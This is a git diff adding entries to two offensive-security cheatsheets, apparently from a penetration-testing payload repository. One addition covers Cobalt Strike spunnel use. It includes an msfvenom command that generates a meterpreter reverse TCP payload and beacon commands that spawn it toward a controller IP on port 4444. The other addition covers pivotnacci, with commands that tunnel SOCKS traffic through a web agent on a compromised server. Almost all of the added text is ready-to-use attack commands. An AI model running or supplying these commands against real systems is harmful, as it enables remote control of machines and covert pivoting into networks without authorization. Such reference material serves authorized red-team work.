diff --git a/Methodology and Resources/Cobalt Strike - Cheatsheet.md b/Methodology and Resources/Cobalt Strike - Cheatsheet.md
index f8975eb2..07742da3 100644
--- a/Methodology and Resources/Cobalt Strike - Cheatsheet.md
+++ b/Methodology and Resources/Cobalt Strike - Cheatsheet.md
@@ -390,6 +390,14 @@ beacon > browserpivot [pid] [x86|x64]
 
 # Bind to the specified port on the Beacon host, and forward any incoming connections to the forwarded host and port.
 beacon > rportfwd [bind port] [forward host] [forward port]
+
+# spunnel : Spawn an agent and create a reverse port forward tunnel to its controller. ~= rportfwd + shspawn.
+msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f raw -o /tmp/msf.bin
+beacon> spunnel x64 184.105.181.155 4444 C:\Payloads\msf.bin
+
+# spunnel_local: Spawn an agent and create a reverse port forward, tunnelled through your Cobalt Strike client, to its controller
+# then you can handle the connect back on your MSF multi handler
+beacon> spunnel_local x64 127.0.0.1 4444 C:\Payloads\msf.bin
 ```
 
 ## Kits
diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md
index 09285a3d..670fae33 100644
--- a/Methodology and Resources/Network Pivoting Techniques.md
+++ b/Methodology and Resources/Network Pivoting Techniques.md
@@ -10,6 +10,7 @@
 * [Proxychains](#proxychains)
 * [Graphtcp](#graphtcp)
 * [Web SOCKS - reGeorg](#web-socks---regeorg)
+* [Web SOCKS - pivotnacci](#web-socks---pivotnacci)
 * [Metasploit](#metasploit)
 * [sshuttle](#sshuttle)
 * [chisel](#chisel)
@@ -118,6 +119,17 @@ optional arguments:
   -v , --verbose Verbose output[INFO|DEBUG]
 ```
 
+## Web SOCKS - pivotnacci
+
+[pivotnacci](https://github.com/blackarrowsec/pivotnacci), a tool to make socks connections through HTTP agents.
+
+```powershell
+pip3 install pivotnacci
+pivotnacci https://domain.com/agent.php --password "s3cr3t"
+pivotnacci https://domain.com/agent.php --polling-interval 2000
+```
+
+
 ## Metasploit
 
 ```powershell